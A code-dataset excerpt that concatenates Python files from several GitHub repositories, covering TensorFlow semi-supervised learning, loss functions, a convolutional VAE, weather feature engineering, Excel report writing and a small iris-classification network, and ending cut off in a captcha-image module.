if n_layer >= 4:
print("Setting n_layer to greater than 3 may results in too large neighborhoods")
# Remove self edges
for i in range(n_node):
try:
extended_graph.remove_edge(i, i)
except:
pass
return nx.to_scipy_sparse_matrix(extended_graph, format='csr')
def get_target_fp(args, dataset, sample_name):
sp_suffix = "_SP" if args.spatial else ""
method_dir = f"{args.arch}{sp_suffix}"
return f"{dataset}/{sample_name}/{method_dir}"
def save_features(args, reduced_reprs, dataset, sample_name):
output_dir = f'{args.output_dir}/{get_target_fp(args, dataset, sample_name)}'
mkdir(output_dir)
feature_fp = os.path.join(output_dir, f"features.tsv")
np.savetxt(feature_fp, reduced_reprs[:, :], delimiter="\t")
print(f"features saved successful at {feature_fp}")
#### Color Util ####
def hex_to_RGB(hex):
''' "#FFFFFF" -> [255,255,255] '''
# Pass 16 to the integer function for change of base
return [int(hex[i:i+2], 16) for i in range(1,6,2)]
def RGB_to_hex(RGB):
''' [255,255,255] -> "#FFFFFF" '''
# Components need to be integers for hex to make sense
RGB = [int(x) for x in RGB]
return "#"+"".join(["0{0:x}".format(v) if v < 16 else
"{0:x}".format(v) for v in RGB])
def color_dict(gradient):
''' Takes in a list of RGB sub-lists and returns dictionary of
colors in RGB and hex form for use in a graphing function
defined later on '''
return {"hex":[RGB_to_hex(RGB) for RGB in gradient],
"r":[RGB[0] for RGB in gradient],
"g":[RGB[1] for RGB in gradient],
"b":[RGB[2] for RGB in gradient]}
def linear_gradient(finish_hex, start_hex="#FFFFFF", n=10):
''' returns a gradient list of (n) colors between
two hex colors. start_hex and finish_hex
should be the full six-digit color string,
        including the number sign ("#FFFFFF") '''
# Starting and ending colors in RGB form
s = hex_to_RGB(start_hex)
f = hex_to_RGB(finish_hex)
    # Initialize a list of the output colors with the starting color
RGB_list = [s]
    # Calculate a color at each evenly spaced value of t from 1 to n
for t in range(1, n):
# Interpolate RGB vector for color at the current value of t
curr_vector = [
int(s[j] + (float(t)/(n-1))*(f[j]-s[j]))
for j in range(3)
]
# Add it to our list of output colors
RGB_list.append(curr_vector)
return color_dict(RGB_list)
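if __name__ == "__main__":
    # Illustrative sketch, not part of the original file: a 5-step white-to-red gradient.
    gradient = linear_gradient("#FF0000", start_hex="#FFFFFF", n=5)
    print(gradient["hex"])  # ['#ffffff', '#ffbfbf', '#ff7f7f', '#ff3f3f', '#ff0000']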
``` |
{
"source": "15110041/semi-memory",
"score": 2
} |
#### File: semi-memory/datasets/dataset_factory.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from datasets import svhn
from datasets import cifar10
from datasets import cifar100
FLAGS = tf.app.flags.FLAGS
datasets_map = \
{
'svhn': svhn,
'cifar10': cifar10,
'cifar100': cifar100,
}
def get_dataset(name, split_name, dataset_dir, file_pattern=None, reader=None):
if name not in datasets_map:
        raise ValueError('Unknown dataset name: %s' % name)
return datasets_map[name].get_split(
split_name,
dataset_dir,
file_pattern,
reader)
```
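The factory above is a plain dispatch table keyed by dataset name. A hedged usage sketch (the data directory below is a placeholder, and the TF-Slim style dataset modules must be importable):

```python
# Hypothetical call; '/tmp/cifar10' stands in for a prepared dataset directory.
dataset = get_dataset('cifar10', 'train', '/tmp/cifar10')
```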
#### File: 15110041/semi-memory/memory.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import network
FLAGS = tf.app.flags.FLAGS
EPISILON=1e-10
mask = lambda x, y: tf.boolean_mask(x, y)
diff = lambda x, n, eta: (x / tf.cast((1 + n), tf.float32))*eta
normalize = lambda x: x / tf.reduce_sum(x, axis=1, keep_dims=True)
def module(reuse_variables, labels, features, inferences):
num_c = FLAGS.num_classes
dim_f = FLAGS.feature_dim
with tf.variable_scope("memory", reuse=reuse_variables):
keys = tf.get_variable('keys',
shape=[num_c, dim_f],
dtype=tf.float32,
initializer=tf.constant_initializer(0.0),
trainable=False)
values = tf.get_variable('values',
shape=[num_c, num_c],
dtype=tf.float32,
initializer=tf.constant_initializer(1.0 / float(num_c)),
trainable=False)
diff_key = tf.gather(keys, labels) - features
diff_value = tf.gather(values, labels) - inferences
y, idx, count = tf.unique_with_counts(labels)
count_n = tf.expand_dims(tf.gather(count, idx), 1)
diff_key = diff(diff_key, count_n, FLAGS.eta)
diff_value = diff(diff_value, count_n, FLAGS.eta)
keys = tf.scatter_sub(keys, labels, diff_key)
values = normalize(tf.scatter_sub(values, labels, diff_value))
return keys, values
def label_ulabel(labels, logits, features):
where_label = tf.not_equal(labels, -1) # unlabel is given as -1
where_unlabel = tf.equal(labels, -1)
labels_l = mask(labels, where_label)
logits_l = mask(logits, where_label)
logits_u = mask(logits, where_unlabel)
features_l = mask(features, where_label)
features_u = mask(features, where_unlabel)
return labels_l, logits_l, logits_u, features_l, features_u
def content_based(keys, values, features_u):
dist = tf.sqrt((features_u[:, tf.newaxis] - keys) ** 2 + EPISILON)
memberships = tf.nn.softmax(-tf.reduce_sum(dist, axis=2))
memberships = tf.clip_by_value(memberships, EPISILON, 1)
pred_u = normalize(tf.reduce_sum(memberships[:, tf.newaxis] * values, 2))
return pred_u
def position_based(values, labels_l):
pred_l = tf.gather(values, labels_l)
return pred_l
def memory_prediction(keys, values, labels_l, features_u):
# key addressing & value reading
pred_l = position_based(values, labels_l)
pred_u = content_based(keys, values, features_u)
return tf.concat([pred_l, pred_u], 0, name='memory_pred')
def assimilation(keys, values, labels_l, features_u, logits):
mem_pred = memory_prediction(keys, values, labels_l, features_u)
net_pred = tf.nn.softmax(logits)
return mem_pred, net_pred
def accomodation(mem_pred, net_pred):
# model entropy
m_entropy = network.loss_entropy(mem_pred)
# memory-network divergence
mn_divergence = network.loss_kl(net_pred, mem_pred)
uncertainty = tf.reduce_max(mem_pred, axis=1)
mnd_weighted = tf.multiply(mn_divergence, uncertainty)
loss_m = tf.reduce_mean(tf.add(m_entropy, mnd_weighted))
return loss_m
```
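`label_ulabel` above relies on the convention that unlabeled samples carry the label -1; the standalone sketch below (with made-up values) shows just that masking step:

```python
# Standalone sketch of the -1 convention; not part of the repository.
import tensorflow as tf

labels = tf.constant([3, -1, 0, -1])   # -1 marks unlabeled samples
logits = tf.zeros((4, 10))
labels_l = tf.boolean_mask(labels, tf.not_equal(labels, -1))  # labeled subset: [3, 0]
logits_u = tf.boolean_mask(logits, tf.equal(labels, -1))      # logits of the unlabeled rows
```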
#### File: 15110041/semi-memory/network.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
from nets import nets_factory
FLAGS = tf.app.flags.FLAGS
TOWER_NAME = 'tower'
EPISILON = 1e-8
def inference(images, num_classes, for_training=False, feature_name=None):
network_fn = nets_factory.get_network_fn(
FLAGS.model_name,
num_classes=num_classes,
weight_decay=FLAGS.weight_decay,
is_training=for_training)
logits, end_points = network_fn(images)
features = tf.squeeze(tf.squeeze(end_points[feature_name], squeeze_dims=1), squeeze_dims=1)
return logits, features
def loss_ce(logits, labels, weight=1.0):
labels = slim.one_hot_encoding(labels, FLAGS.num_classes)
return tf.cond(tf.size(labels) > 0,
lambda: tf.losses.softmax_cross_entropy(
logits=logits,
onehot_labels=labels,
label_smoothing=FLAGS.smoothing*float(FLAGS.num_classes),
weights=weight),
lambda: tf.constant(0.0))
def loss_entropy(p_prob, weight=1.0):
entropy = -tf.multiply(p_prob, tf.log(p_prob+EPISILON))
return tf.multiply(weight, tf.reduce_sum(entropy, axis=1), name='entropy')
def loss_kl(p_prob, q_prob, weight=1.0):
KL_divergence = tf.multiply(p_prob, tf.log(tf.divide(p_prob, q_prob) + EPISILON))
return tf.multiply(weight, tf.reduce_sum(KL_divergence, axis=1), name='kl')
def average_gradients(tower_grads):
average_grads = []
for grad_and_vars in zip(*tower_grads):
grads = []
for g, _ in grad_and_vars:
expanded_g = tf.expand_dims(g, 0)
grads.append(expanded_g)
grad = tf.concat(grads, 0)
grad = tf.reduce_mean(grad, 0)
grad = tf.clip_by_value(grad, -2., 2.)
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
``` |
{
"source": "15116087527/new-interface",
"score": 2
} |
#### File: new-interface/rw_data/excel_w.py
```python
import os
import time
from pyExcelerator import *
from Public.main import ks
# def excel():
# fname = "..\\Case\\test.xlsx"
# bk = xlrd.open_workbook(fname)
# try:
# sh = bk.sheet_by_name('Sheet1')
# except:
#         print "%s has no sheet named Sheet1" % fname
#     # get the number of rows
#     # nrows = sh.nrows
#     # # get the number of columns
# # ncols = sh.ncols
# # print (nrows),(ncols)
# return sh.row_values(0)
class apc:
def exceslw(self):
aps = [u'用例ID', u'用例名', u'url', u'参数值', u'请求方式', u'期望', u'实际返回', u'结果']
# print aps
        w = Workbook() # create a workbook
        ws = w.add_sheet('Hey, Hades') # create a worksheet
# ws = copy('..\\Case\\test.xlsx')
pc = ks()
# print pc
for i in range(len(pc)):
for j in range(len(pc[i])):
                # ws.write(i,j,aps[j]) # write into row 1, col 1
a = pc[i][j]
if j == 6:
                    ws.write(i, j, a.decode('utf-8')) # write into row 1, col 1
else:
ws.write(i, j, a)
timestr = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
a = os.path.exists('..\\report\\%s'%timestr)
if a == False:
os.makedirs('..\\report\\%s'%timestr)
        w.save('..\\report\\%s\\case_result.xlsx'%timestr) # save the workbook
return pc
``` |
{
"source": "151232summerday/IJCAI17_Tianchi_Rank4",
"score": 2
} |
#### File: IJCAI17_Tianchi_Rank4/feature/WEATHER_FEATURES.py
```python
import numpy as np
import pandas as pd
import math
import sys
sys.path.append('../TOOLS')
from IJCAI2017_TOOL import *
def SSD(Temp,Velo,Humi):
score = (1.818*Temp+18.18) * (0.88+0.002*Humi) + 1.0*(Temp -32)/(45-Temp) - 3.2*Velo + 18.2
return score
WEATHER_raw = pd.read_csv('../additional/WEATHER_raw.csv',encoding = 'gbk',low_memory=False)
#%%
def AMPM2decimal(ser):
tt = ser.replace(' ',':').split(':')
tt[0] = np.int(tt[0])%12
if (tt[2] == 'AM'):
return np.float(tt[0]) + np.float(tt[1])/60.
if (tt[2] == 'PM'):
return np.float(tt[0]) + np.float(tt[1])/60. + 12.
def Eventclean(ser):
try:
if (math.isnan(ser)):
return 'None'
except:
tt = ser.replace('\n','\r').replace('\t','\r').split('\r')
tt2 = ''.join(tt)
return tt2
#%% clean the raw data
WEATHER_raw = WEATHER_raw[['DATE','Time','Temp','Visibility','Wind_speed','Humidity','Event','Condition','CITY_EN']]
WEATHER_raw['Time'] = [(lambda x:AMPM2decimal(x) ) (x) for x in WEATHER_raw['Time']]
WEATHER_raw['Event'] = [(lambda x:Eventclean(x) ) (x) for x in WEATHER_raw['Event']]
WEATHER_raw['Visibility'] = WEATHER_raw['Visibility'].replace('-',np.nan).fillna(method='ffill')
WEATHER_raw['Visibility'] = pd.to_numeric(WEATHER_raw['Visibility'], errors='ignore')
WEATHER_raw['Temp'] = WEATHER_raw['Temp'].replace('-',0.0)
WEATHER_raw['Temp'] = pd.to_numeric(WEATHER_raw['Temp'], errors='ignore')
WEATHER_raw.loc[ WEATHER_raw['Wind_speed'] == 'Calm','Wind_speed']= 0.0
WEATHER_raw['Wind_speed'] = WEATHER_raw['Wind_speed'].replace('-','3.6')
WEATHER_raw['Wind_speed'] = pd.to_numeric(WEATHER_raw['Wind_speed'], errors='ignore')
WEATHER_raw['Wind_speed'] = WEATHER_raw['Wind_speed']/3.6
WEATHER_raw['Humidity'] = WEATHER_raw['Humidity'].replace('N/A%','5%')
WEATHER_raw.loc[ WEATHER_raw['Humidity'] == '%','Humidity']= '5%'
WEATHER_raw['Humidity'] = [(lambda x: (np.int(x.split('%')[0]) ) ) (x) for x in WEATHER_raw['Humidity']]
WEATHER_raw['SSD'] = SSD(WEATHER_raw['Temp'] ,WEATHER_raw['Wind_speed'],WEATHER_raw['Humidity'])
WEATHER_raw.loc[ WEATHER_raw['Condition'] == 'Unknown','Condition']= np.nan
WEATHER_raw['Condition'] = WEATHER_raw['Condition'].fillna(method='ffill')
WEATHER_CON_LEVEL = pd.read_csv('WEATHER_CON_LEVEL.csv')
WEATHER_raw = pd.merge(WEATHER_raw, WEATHER_CON_LEVEL, on = 'Condition', how = 'left')
WEATHER_raw[['RAIN_IND','CLEAR_IND']] = WEATHER_raw[['RAIN_IND','CLEAR_IND']].fillna(0.0)
WEATHER_raw = WEATHER_raw[['DATE','Time','CITY_EN','SSD','RAIN_IND','CLEAR_IND']]
time1 = WEATHER_raw[((WEATHER_raw['Time']<=18.5) & ((WEATHER_raw['Time']>=11)) )]
#
time1_group = time1.groupby(['CITY_EN','DATE'],as_index = False).mean()
#
time1_group['SSD_C'] = np.abs(time1_group['SSD']-60) - np.abs(time1_group['SSD'].shift(1) -60)
time1_group = time1_group[((time1_group['DATE']<='2016-11-20') &(time1_group['DATE']>='2015-06-26')) ]
time1_group = time1_group.rename(columns = {'SSD':'RC','SSD_C':'RE','RAIN_IND':'RG','CLEAR_IND':'RI'})
#
time1_group = time1_group[['CITY_EN','DATE','RC','RE','RG','RI']]
time1_group.to_csv('WEATHER_FEATURES.csv',index = False)
``` |
{
"source": "151232summerday/Tencent_Ads_Algo_2018",
"score": 3
} |
#### File: src/data_tool/feature.py
```python
import numpy as np
import logging
import warnings
class FeatureInfo:
def __init__(self):
self.name = None
# include empty
self.ma = None
# note the second last is for empty, the last is for special value
# counter
self.ctr = None
# counter for positive label
self.mapper = None
@property
def empty_val(self):
# it is empty val
return self.ma
@property
def special_val(self):
return self.ma+1
@property
def n_val(self):
return len(self.ctr)
def construct(self,name,ma):
warnings.warn("This method assume empty val is not included in ma by default."
" It is not consistent with other function.")
self.name = name
self.ma = ma
# todo we could use dict as ctr
self.ctr = np.zeros(shape=(self.ma+2,),dtype=np.int32)
self.mapper = None
def __str__(self):
string = "{name}|{ma}|{ctr}".format(
name=self.name,
ma=self.ma,
ctr=" ".join([str(i) for i in self.ctr]),
)
return string
__repr__ = __str__
def to_str(self):
string = "{}\n".format(self.__str__())
return string
def from_str(self,string,special_val=True):
assert special_val==True
string = string.strip()
records = string.split("|")
assert len(records)==3
self.name = records[0]
self.ma = int(records[1])
self.ctr = np.fromstring(records[2].strip("]["), dtype=np.int32, sep=" ")
self.mapper = None
def construct_mapping(self):
self.mapper = np.arange(0,len(self.ctr),dtype=np.int)
logging.info("{} constructs its mapping, {} possible values.".format(self.name,self.n_val))
def construct_filter(self, l_freq):
'''
        :param l_freq: lowest frequency
:return:
'''
self.filter = set()
for i in range(self.ctr.size):
if self.ctr[i]<l_freq:
self.filter.add(i)
# modify mapper and ctr
self.ctr[self.special_val] = 0
for i in self.filter:
self.mapper[i] = self.special_val
self.ctr[self.special_val] += self.ctr[i]
logging.info("{} constructs its filter, {}/{} values of lower freq than {} are filterd, then mapped to special value {}".format(self.name,len(self.filter),self.n_val,l_freq,self.special_val))
def map(self,idices):
return np.unique(self.mapper[idices])
def get_freqs(self,idices):
'''
        Note !!! only mapped indices are supported.
:param idices: mapped idices
:return:
'''
warnings.warn("We should use mapped idices in get_freqs...")
freqs = self.ctr[idices]
return freqs
if __name__ == "__main__":
fn = "data/A_shiyu/mapped_user_feature_infos.txt"
from lib.debug.tools_v2 import load_feature_infos
feature_infos = load_feature_infos(fn)
feature_infos[5].construct_mapping()
print(feature_infos[5].name,feature_infos[5].mapper.shape)
print(feature_infos[5])
#print(feature_infos)
```
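A small round-trip sketch for `FeatureInfo` serialization (not part of the repo; the import path, feature name, and counts are made up):

```python
# Hypothetical round trip through to_str / from_str; the import path is an assumption.
from src.data_tool.feature import FeatureInfo

fi = FeatureInfo()
fi.construct("age", ma=10)   # ctr gets ma + 2 slots (empty value + special value)
fi.ctr[3] = 7
restored = FeatureInfo()
restored.from_str(fi.to_str())
print(restored.name, restored.ma, restored.n_val)  # -> age 10 12
```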
#### File: src/lib/logger.py
```python
import os
import logging
import shutil
def create_logger(output_path,comment,timestamp):
# archive_name = "{}_{}.tgz".format(cfg_name, time.strftime('%Y-%m-%d-%H-%M'))
# archive_path = os.path.join(os.path.join(final_output_path, archive_name))
# pack_experiment(".",archive_path)
log_file = '{}_{}.log'.format(timestamp,comment)
head = '%(levelname)s %(asctime)-15s %(message)s'
logging.basicConfig(filename=os.path.join(output_path, log_file), format=head)
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
return logger
```
#### File: src/loss/focal_loss.py
```python
import torch
import torch.nn as nn
def bce_focal_loss(input, target, gamma=2, weight=None, size_average=True, reduce=True):
if not (target.size() == input.size()):
raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
max_val = (-input).clamp(min=0)
loss = input - input * target + max_val + ((-max_val).exp() + (-input - max_val).exp()).log()
prob = torch.sigmoid(input)
prob_for_gt = target*prob+(1-target)*(1-prob)
if weight is not None:
loss = loss * weight
loss = loss * torch.pow((1-prob_for_gt),gamma)
#print(torch.pow((1-prob_for_gt),gamma))
if not reduce:
return loss
elif size_average:
return loss.mean()
else:
return loss.sum()
if __name__=="__main__":
from torch.autograd import Variable
input = Variable(torch.Tensor([-2.197,0.0,2.197]))
target = Variable(torch.Tensor([0,0,1]))
loss = bce_focal_loss(input,target)
print(loss)
```
#### File: src/loss/hinge_loss.py
```python
import torch
def hinge_loss(input,target,margin=1,weight=None,size_average=True):
'''
:param input:
:param target: assume to be {0,1}
:param margin:
:param weight:
:param size_average:
:return:
'''
target = 2*target-1
l = torch.max(margin-input*target,torch.zeros_like(target))
if weight is not None:
l = l * weight
if size_average:
l = torch.mean(l)
else:
l = torch.sum(l)
return l
if __name__=="__main__":
from torch.autograd import Variable
x = Variable(torch.FloatTensor([0.5,1.7,1.0]))
y = Variable(torch.FloatTensor([1,1,0]))
l = hinge_loss(x,y,size_average=False)
print(l)
``` |
{
"source": "1512474508/deep-generative-models",
"score": 2
} |
#### File: deep-generative-models/src/generate_samples_CVAE.py
```python
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
import argparse
import os
import imageio
import pandas as pd
from obj.CVAE import CVAE
##############################
# plot CVAE manifold
##############################
def squareToSpiral(d):
D = d-1
res = [0]
while D >= 0:
# downwards
if D != d-1:
res.extend([res[len(res)-1] + 1])
res.extend([res[len(res)-1]+(i+1) for i in range(D)])
# rightwards
res.extend([res[len(res)-1]+(i+1)*d for i in range(D)])
# upwards
res.extend([res[len(res)-1]-(i+1) for i in range(D)])
# leftwards
res.extend([res[len(res)-1]-(i+1)*d for i in range(D-1)])
# update counter, makes move for even and odd respectively
D -= 2
return res
def plotManifold_CVAE(namePickle,nameFile,im_dim,grid_size,latent_range,std,num_samples):
""" canvas code adapted from https://jmetzen.github.io/2015-11-27/vae.html """
print("plotting manifold samples")
dim = pd.read_csv("./pickles/"+namePickle+"/log.csv")["latent_dimensions"][0]
model = CVAE(dim)
model.load_weights("./pickles/"+namePickle+"/cvae")
nx = ny = grid_size
x_values = np.linspace(-latent_range, latent_range, nx)
y_values = np.linspace(-latent_range, latent_range, ny)
canvas = np.empty((im_dim*ny, im_dim*nx))
s = [std for i in range(dim)]
load=[]
for i, yi in enumerate(x_values):
for j, xi in enumerate(y_values):
mean = [xi for i in range(int(dim/2))]+[yi for i in range(int(np.ceil(dim/2)))]
x_mean = tf.reduce_mean(model.sample(tf.random.normal((num_samples,model.latent_dim),mean=mean,stddev=s)),axis=0)[:,:,0]
load.append(x_mean)
canvas[(nx-i-1)*im_dim:(nx-i)*im_dim, j*im_dim:(j+1)*im_dim] = x_mean
plt.figure(figsize=(8, 10))
Xi, Yi = np.meshgrid(x_values, y_values)
plt.imshow(canvas, origin="upper", cmap="gray")
plt.tight_layout()
plt.savefig(os.path.abspath(os.path.dirname(os.getcwd()))+"/img/"+nameFile+".png", dpi=400)
# create gif
print("creating transition gif")
indices = squareToSpiral(grid_size)
load = [load[i].numpy() for i in indices]
kargs = {'duration': 0.01}
imageio.mimsave(os.path.abspath(os.path.dirname(os.getcwd()))+"/img/"+nameFile+".gif",load, **kargs)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--out", type=str, default="test",
help="file name of output png <default: 'test'>")
parser.add_argument("--im-dim", type=int, default=28,
help="square dimensions on which to remap images <default: 28>")
parser.add_argument("--grid-size", type=int, default=40,
help="square dimensions or sensitivity of grid plot <default: 40>")
parser.add_argument("--latent-range", type=float, default=3,
help="range on which to search manifold mean <default: 3>")
parser.add_argument("--std", type=float, default=0.01,
help="standard deviation of latent distribution <default: 0.01>")
parser.add_argument("--num-samples", type=int, default=50,
help="number of averaging samples per plot cell <defaults: 50>")
requiredNamed = parser.add_argument_group('required named arguments')
requiredNamed.add_argument('-p', '--pickle', type=str,
help="name of directory where cvae weights are stored",
required=True)
args = parser.parse_args()
plotManifold_CVAE(args.pickle,args.out,args.im_dim,args.grid_size,args.latent_range,args.std,args.num_samples)
```
#### File: src/obj/CVAE.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
import numpy as np
class CVAE(tf.keras.Model):
"""
Convolutional Variational Autoencoder (VAE)
sub-class of tf.keras.Model
code modified from TF2 CVAE tutorial:
https://www.tensorflow.org/alpha/tutorials/generative/cvae
"""
def __init__(self, latent_dim, epochs = 5, batch_size = 50, learning_rate = 0.001,
im_dim = 28, n_filters = 32):
""" initialize model layers and parameters """
super(CVAE, self).__init__()
self.epochs = epochs
self.batch_size = batch_size
self.learning_rate = learning_rate
self.optimizer = tf.keras.optimizers.Adam(self.learning_rate)
self.latent_dim = latent_dim
self.im_dim = im_dim
self.n_filters = n_filters
self.inference_net = tf.keras.Sequential(
[
tf.keras.layers.InputLayer(input_shape=(int(self.im_dim), int(self.im_dim), 1)),
tf.keras.layers.Conv2D(
filters=int(self.n_filters), kernel_size=3, strides=(2, 2), activation='relu'),
tf.keras.layers.Flatten(),
# No activation
tf.keras.layers.Dense(latent_dim + latent_dim),
])
self.generative_net = tf.keras.Sequential(
[
tf.keras.layers.InputLayer(input_shape=(latent_dim,)),
tf.keras.layers.Dense(units=(int((self.im_dim/2)**2)*self.n_filters), activation=tf.nn.relu),
tf.keras.layers.Reshape(target_shape=(int(self.im_dim/2), int((self.im_dim/2)), self.n_filters)),
tf.keras.layers.Conv2DTranspose(
filters=int(self.n_filters),
kernel_size=3,
strides=(2, 2),
padding="SAME",
activation='relu'),
# No activation
tf.keras.layers.Conv2DTranspose(
filters=1, kernel_size=3, strides=(1, 1), padding="SAME"),
])
# @tf.function
def encode(self, x):
""" encode input data into log-normal distribution at latent layer """
mean, logvar = tf.split(self.inference_net(x), num_or_size_splits=2, axis=1)
return mean, logvar
def reparameterize(self, mean, logvar):
""" reparameterize normal distribution from learned mean/variance """
eps = tf.random.normal(shape=mean.shape)
return eps * tf.exp(logvar * .5) + mean
# @tf.function
def decode(self, z, apply_sigmoid=False):
""" decode latent variables into visible samples """
logits = self.generative_net(z)
if apply_sigmoid:
probs = tf.sigmoid(logits)
return probs
else:
return logits
def log_normal_pdf(self, sample, mean, logvar, raxis=1):
""" function for defining log normal PDF """
log2pi = tf.math.log(2. * np.pi)
return tf.reduce_sum(-.5 * ((sample - mean) ** 2. * tf.exp(-logvar) + logvar + log2pi),
axis=raxis)
def compute_loss(self, x):
""" compute ELBO loss given hyperparamters """
mean, logvar = self.encode(x)
z = self.reparameterize(mean, logvar)
x_logit = self.decode(z)
cross_ent = tf.nn.sigmoid_cross_entropy_with_logits(logits=x_logit, labels=x)
logpx_z = -tf.reduce_sum(cross_ent, axis=[1, 2, 3])
logpz = self.log_normal_pdf(z, 0., 0.)
logqz_x = self.log_normal_pdf(z, mean, logvar)
return -tf.reduce_mean(logpx_z + logpz - logqz_x)
def compute_gradients(self, x):
""" compute gradient given ELBO loss """
with tf.GradientTape() as tape:
loss = self.compute_loss(x)
return tape.gradient(loss, self.trainable_variables), loss
def apply_gradients(self, gradients):
""" apply adam gradient descent optimizer for learning process """
self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))
def train(self, train_dataset):
""" main training call for CVAE """
num_samples = int(train_dataset.shape[0]/self.batch_size)
train_dataset = tf.data.Dataset.from_tensor_slices(train_dataset).shuffle(train_dataset.shape[0]).batch(self.batch_size)
for i in range(self.epochs):
j = 1
norm = 0
Loss = 0
print("Epoch: %s" % str(i+1))
for train_x in train_dataset:
gradients, loss = self.compute_gradients(train_x)
Loss += loss
norm += tf.reduce_mean([tf.norm(g) for g in gradients])
self.apply_gradients(gradients)
if j != 1 and j % 20 == 0:
# good to print out euclidean norm of gradients
tf.print("Epoch: %s, Batch: %s/%s" % (i+1,j,num_samples))
tf.print("Mean-Loss: ", Loss/j, ", Mean gradient-norm: ", norm/j)
j += 1
def sample(self, eps=None, num = 50):
""" sample latent layer and decode to generated visible """
if eps is None:
eps = tf.random.normal(shape=(num, self.latent_dim))
return self.decode(eps, apply_sigmoid=True)
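if __name__ == "__main__":
    # Illustrative smoke test, not part of the original file: train briefly on random data.
    data = np.random.rand(100, 28, 28, 1).astype("float32")
    model = CVAE(latent_dim=2, epochs=1, batch_size=50)
    model.train(data)
    samples = model.sample(num=4)
    print(samples.shape)  # expected: (4, 28, 28, 1)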
``` |
{
"source": "1514louluo/influx-proxy",
"score": 3
} |
#### File: influx-proxy/influx-test/mytime.py
```python
import time
class mytime:
def fz(self, x):
        # pad single digits with a leading zero
if x / 10 >= 1:
return str(x)
else:
return '0'+str(x)
def __init__(self, Y, M, D, h, m, s, ms=0, us=0, ns=0):
self.format_time = str(Y) + '-' + self.fz(M) + '-' + self.fz(D) + ' ' + \
self.fz(h) + ':' + self.fz(m) + ':' + self.fz(s)
self.format = '%Y-%m-%d %X'
self.struct_time = time.strptime(self.format_time, self.format)
self.timestamp = int(time.mktime(self.struct_time))
self.ms = ms
self.us = us
self.ns = ns
def t_h(self):
return self.timestamp / 3600
def t_m(self):
return self.timestamp / 60
def t_s(self):
return self.timestamp
def t_ms(self):
return self.timestamp * 1000 + self.ms
def t_us(self):
return self.timestamp * 1000000 + self.us
def t_ns(self):
return self.timestamp * 1000000000 + self.ns
def after(self, sec):
        # return a placeholder time object;
        # only its timestamp is guaranteed to be correct
a = mytime(2000,1,1,1,1,1, self.ms, self.us, self.ns)
a.timestamp = self.timestamp + sec
return a
def t_p(self, precision):
td = {
'h': self.t_h(),
'm': self.t_m(),
's': self.t_s(),
'ms': self.t_ms(),
'us': self.t_us(),
'ns': self.t_ns(),
}
return td[precision]
``` |
{
"source": "1520098156/iris_classifying",
"score": 3
} |
#### File: 1520098156/iris_classifying/iris_NN.py
```python
import numpy as np
from sklearn.model_selection import train_test_split
def sigmoid(x):
return 1 / (1 + np.exp(-x))
# loss function
def loss_function(a, y):
return -(y * np.log(a) + (1 - y) * np.log(1 - a))
class iris_NN:
def __init__(self, iris_data):
self.lr = 0.1 # learning rate
self.iris_data = iris_data
X = np.array(self.iris_data[0:, 0:4])
y = np.array([self.iris_data[0:, 4]])
y = y.T
        X = X / 8 * 0.99 + 0.01 # normalize
X_train, X_test, self.y_train, self.y_test = train_test_split(X, y)
self.X_train = X_train.T
self.X_test = X_test.T
oneHot = np.identity(3)
for i in range(oneHot.shape[0]):
for j in range(oneHot.shape[1]):
if oneHot[i, j] == 1:
oneHot[i, j] = 0.99
else:
oneHot[i, j] = 0.01
y_true = oneHot[self.y_train.T.astype(int)][0]
self.y_true = y_true.T
self.a2 = np.zeros((3, 38))
self.W1 = np.random.normal(0.0, 1, (8, 4))
self.W2 = np.random.normal(0.0, 1, (3, 8))
self.B1 = np.zeros((8, 1))
self.B2 = np.zeros((3, 1))
def train(self):
W1 = np.random.normal(0.0, 1, (8, 4))
W2 = np.random.normal(0.0, 1, (3, 8))
B1 = np.zeros((8, 1))
B2 = np.zeros((3, 1))
for epoch in range(5000):
out1 = np.dot(W1, self.X_train) + B1
act1 = sigmoid(out1)
out2 = np.dot(W2, act1) + B2
act2 = sigmoid(out2)
dZ2 = act2 - self.y_true
dW2 = 1 / 112 * np.dot(dZ2, act1.T)
dB2 = 1 / 112 * np.sum(dW2, axis=1, keepdims=True)
dZ1 = np.dot(W2.T, dZ2) * (act1 * (1 - act1))
dW1 = 1 / 112 * np.dot(dZ1, self.X_train.T)
dB1 = 1 / 112 * np.sum(dZ1, axis=1, keepdims=True)
W2 -= self.lr * dW2
B2 -= self.lr * dB2
W1 -= self.lr * dW1
B1 -= self.lr * dB1
            # print the loss once every 200 epochs
# if epoch % 200 == 0:
# print(np.sum(loss_function(act2, self.y_true)))
self.W2 = W2
self.B2 = B2
self.W1 = W1
self.B1 = B1
def test(self):
result = []
o1 = np.dot(self.W1, self.X_test) + self.B1
a1 = sigmoid(o1)
o2 = np.dot(self.W2, a1) + self.B2
a2 = sigmoid(o2)
for i in range(a2.T.shape[0]):
result.append(np.argmax(a2.T[i]))
true_no = 0
for i in range(len(result)):
if result[i] == self.y_test[i][0]:
true_no += 1
print('Correct rate =', true_no / len(result) * 100, '%')
def predict(self, X_predict):
result = []
out1 = np.dot(self.W1, X_predict) + self.B1
act1 = sigmoid(out1)
out2 = np.dot(self.W2, act1) + self.B2
act2 = sigmoid(out2)
for i in range(act2.T.shape[0]):
result.append(np.argmax(act2.T[i]))
result = np.array([result])
print('Prediction is:')
print(result)
print('\'0\' means setosa\n\'1\' means versicolor\n\'2\' means virginica')
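if __name__ == "__main__":
    # Illustrative sketch, not part of the original file: load iris via sklearn and run the NN.
    from sklearn.datasets import load_iris
    iris = load_iris()
    data = np.hstack([iris.data, iris.target.reshape(-1, 1)])  # 4 feature columns + 1 label column
    nn = iris_NN(data)
    nn.train()
    nn.test()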
``` |
{
"source": "15207135348/Java12306",
"score": 2
} |
#### File: python/vertifyimage/main.py
```python
import base64
from keras import models
import tensorflow as tf
import os
